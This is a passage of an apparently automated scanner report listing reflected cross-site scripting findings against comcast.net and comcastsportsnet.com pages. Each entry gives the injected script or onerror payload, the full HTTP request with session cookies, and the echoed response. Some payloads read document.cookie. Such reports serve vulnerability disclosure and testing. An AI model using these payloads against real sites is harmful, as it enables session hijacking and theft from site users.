Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:12 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:12 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/news/world8771d"><script>alert(1)</script>ed2178a344a/" type="application/rss+xml" title="Comcast.net - News" id="rss" />
...[SNIP]...

2.168. http://www.comcast.net/news/world/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/world/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c04<img%20src%3da%20onerror%3dalert(1)>82df29b4567 was submitted in the REST URL parameter 2. This input was echoed as 94c04<img src=a onerror=alert(1)>82df29b4567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/world94c04<img%20src%3da%20onerror%3dalert(1)>82df29b4567/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:24 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:24 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='news' subchannel'world94c04<img src=a onerror=alert(1)>82df29b4567'</h2>
...[SNIP]...

2.169. http://www.comcast.net/news/world/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/world/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload bedb8--><img%20src%3da%20onerror%3dalert(1)>e40b1a4d5bd was submitted in the REST URL parameter 2. This input was echoed as bedb8--><img src=a onerror=alert(1)>e40b1a4d5bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/worldbedb8--><img%20src%3da%20onerror%3dalert(1)>e40b1a4d5bd/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:29 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: worldbedb8--><img src=a onerror=alert(1)>e40b1a4d5bd -->
...[SNIP]...

2.170. http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/entertainment-mostpopulargooglesearches2010/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3f48"><script>alert(1)</script>bce088a4eb7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /slideshow/entertainment-mostpopulargooglesearches2010f3f48"><script>alert(1)</script>bce088a4eb7/ HTTP/1.1
Host: www.comcast.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEkzu4Y4ACqRj; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; ev41=%26%23039%3B; xuc=c=2; page_counts=2,2; s_lastVisit=11/2010; prefs=pagemsg.state=false; s_cc=true; s_campaign=NET_33_0; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; mbox=check#true#1292781931|session#1292781870292-178614#1292783731

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:06:31 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:11:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:06:31 GMT
Connection: close
Content-Length: 32456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/entertainment-mostpopulargooglesearches2010f3f48"><script>alert(1)</script>bce088a4eb7/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.171. http://www.comcast.net/slideshow/finance-branddisasters/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/finance-branddisasters/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c9a"><script>alert(1)</script>cf869bb5a0f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /slideshow/finance-branddisasters15c9a"><script>alert(1)</script>cf869bb5a0f/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:11:31 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:16:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:11:31 GMT
Content-Length: 31820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/finance-branddisasters15c9a"><script>alert(1)</script>cf869bb5a0f/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.172. http://www.comcast.net/slideshow/music-greenday [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/music-greenday

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e38"><script>alert(1)</script>2b6b246c1a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /slideshow/music-greenday89e38"><script>alert(1)</script>2b6b246c1a3 HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:11:35 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:16:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:11:35 GMT
Content-Length: 31730
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/music-greenday89e38"><script>alert(1)</script>2b6b246c1a3/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.173. http://www.comcast.net/slideshow/news-spacepictures [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/news-spacepictures

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cae2"><script>alert(1)</script>5af3151e2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /slideshow/news-spacepictures6cae2"><script>alert(1)</script>5af3151e2b HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:11:32 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:16:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:11:32 GMT
Content-Length: 31725
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/news-spacepictures6cae2"><script>alert(1)</script>5af3151e2b/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.174. http://www.comcast.net/slideshow/sports-bestdressedathletes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/sports-bestdressedathletes/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef90d"><script>alert(1)</script>0349d93d9fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /slideshow/sports-bestdressedathletesef90d"><script>alert(1)</script>0349d93d9fb/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:11:33 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:16:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:11:33 GMT
Content-Length: 31876
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/sports-bestdressedathletesef90d"><script>alert(1)</script>0349d93d9fb/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.175. http://www.comcast.net/weather/19103/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /weather/19103/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 74f43--><img%20src%3da%20onerror%3dalert(1)>935e2e5728f was submitted in the REST URL parameter 2. This input was echoed as 74f43--><img src=a onerror=alert(1)>935e2e5728f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /weather/1910374f43--><img%20src%3da%20onerror%3dalert(1)>935e2e5728f/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:35 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta ht
...[SNIP]...
<!-- subchannel: 1910374f43--><img src=a onerror=alert(1)>935e2e5728f -->
...[SNIP]...

2.176. http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/a [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2f676<img%20src%3da%20onerror%3dalert(1)>46d5a7f7ec5 was submitted in the REST URL parameter 2. This input was echoed as 2f676<img src=a onerror=alert(1)>46d5a7f7ec5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f2f676<img%20src%3da%20onerror%3dalert(1)>46d5a7f7ec5/a HTTP/1.1
Host: www.comcast.net
Proxy-Connection: keep-alive
Referer: http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEkzu4Y4ACqRj; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; xuc=c=2; prefs=pagemsg.state=false; page_counts=4,2; s_lastVisit=11/2010; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1292781870292-178614#1292784860|PC#1292781870292-178614.20#1293992600|check#true#1292783060; fsr.a=1292782999825

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:35:40 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:40:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:35:40 GMT
Connection: close
Content-Length: 37346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta ht
...[SNIP]...
<img src=a onerror=alert(document.cookie)>935e2e5728f2f676<img src=a onerror=alert(1)>46d5a7f7ec5 -->
...[SNIP]...

2.177. http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src=a%20onerror=alert(document.cookie)%3E935e2e5728f/a/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /weather/1910374f43--%3E%3Cimg%20src=a%20onerror=alert(document.cookie)%3E935e2e5728f/a/

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 90356><img%20src%3da%20onerror%3dalert(1)>54eae5f6d84 was submitted in the REST URL parameter 2. This input was echoed as 90356><img src=a onerror=alert(1)>54eae5f6d84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /weather/1910374f43--%3E%3Cimg%20src90356><img%20src%3da%20onerror%3dalert(1)>54eae5f6d84=a%20onerror=alert(document.cookie)%3E935e2e5728f/a/ HTTP/1.1
Host: www.comcast.net
Proxy-Connection: keep-alive
Referer: http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEkzu4Y4ACqRj; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; xuc=c=2; prefs=pagemsg.state=false; page_counts=4,2; s_lastVisit=11/2010; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1292781870292-178614#1292784860|PC#1292781870292-178614.20#1293992600|check#true#1292783060; fsr.a=1292782999825

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:37:57 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:42:57 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:37:57 GMT
Connection: close
Content-Length: 37360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta ht
...[SNIP]...
<img src90356><img src=a onerror=alert(1)>54eae5f6d84=a onerror=alert(document.cookie)>
...[SNIP]...

2.178. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57e8b<script>alert(1)</script>f39eff7e154 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common57e8b<script>alert(1)</script>f39eff7e154/global_flash/player/player.php HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:42 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common57e8b<script>alert(1)</script>f39eff7e154/global_flash/player/player.php"</strong>
...[SNIP]...

2.179. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd281<script>alert(1)</script>15e0ecd7081 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flashbd281<script>alert(1)</script>15e0ecd7081/player/player.php HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:42 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flashbd281<script>alert(1)</script>15e0ecd7081/player/player.php"</strong>
...[SNIP]...

2.180. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 3]

Summary

